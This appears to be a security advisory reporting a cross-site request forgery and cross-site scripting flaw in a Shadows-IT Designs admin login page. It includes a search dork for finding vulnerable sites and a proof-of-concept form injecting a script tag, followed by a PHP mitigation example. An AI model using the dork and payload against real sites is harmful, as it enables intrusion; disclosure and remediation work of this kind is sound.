Shadows-IT Designs CSRF XSS

2016.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

######################
# Exploit Title : Shadows-IT Designs CSRF XSS
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.shadows-it.com/
# Google Dork : "intext:Powerd By Shadows-IT" inurl:?.php?page=
# Date: 2016/02/12
#
######################
# Vulnerable PHP File : /admin/index.php
# Vulnerable Parameter : login_name
# Exploit :
#
#<form action="http://site.com/admin/index.php?page=bG9naW4=&op=Y2hlY2s=" method="post" name="login_form" >
#<input class="EDIT_LABEL" type="text" value='"><script>alert(1)</script>"' name="login_name" >
#<input type="submit" name="button" value="&nbsp;LogIn&nbsp;" class="Button" >
#</form>
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
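
The mitigation for both halves of this report, as an added example that is not the vendor's code or part of the original advisory: login_name is HTML-encoded before being written back into the form, and the POST is rejected unless it carries a per-session token. It assumes the page echoes login_name into the login form's value attribute; the helper names h, csrf_token and csrf_ok, the csrf_token field and the 64-byte length limit are assumptions, and the form markup follows the proof of concept.

```php
<?php
declare(strict_types=1);
// Hypothetical hardened login step for /admin/index.php (not the vendor's code).
// h(), csrf_token(), csrf_ok() and the csrf_token field are assumed names.
session_start();

/** Encode untrusted text for a quoted HTML attribute or element body. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Per-session anti-CSRF token, created on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only when the POST carries the token issued to this session. */
function csrf_ok(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && hash_equals(csrf_token(), $sent);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST' && !csrf_ok($_POST)) {
    http_response_code(403); // a form posted from another origin has no valid token
    exit('Invalid request token');
}

// login_name is untrusted: force it to a string and bound its length (assumed limit).
$loginName = $_POST['login_name'] ?? '';
$loginName = is_string($loginName) ? substr($loginName, 0, 64) : '';
?>
<form action="index.php?page=bG9naW4=&amp;op=Y2hlY2s=" method="post" name="login_form">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input class="EDIT_LABEL" type="text" name="login_name" value="<?= h($loginName) ?>">
  <input type="submit" name="button" value="&nbsp;LogIn&nbsp;" class="Button">
</form>
```

With this encoding the value from the proof of concept is emitted as `&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&quot;`, so it stays inside the attribute as literal text.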


Copyright 2024, cxsecurity.com

 
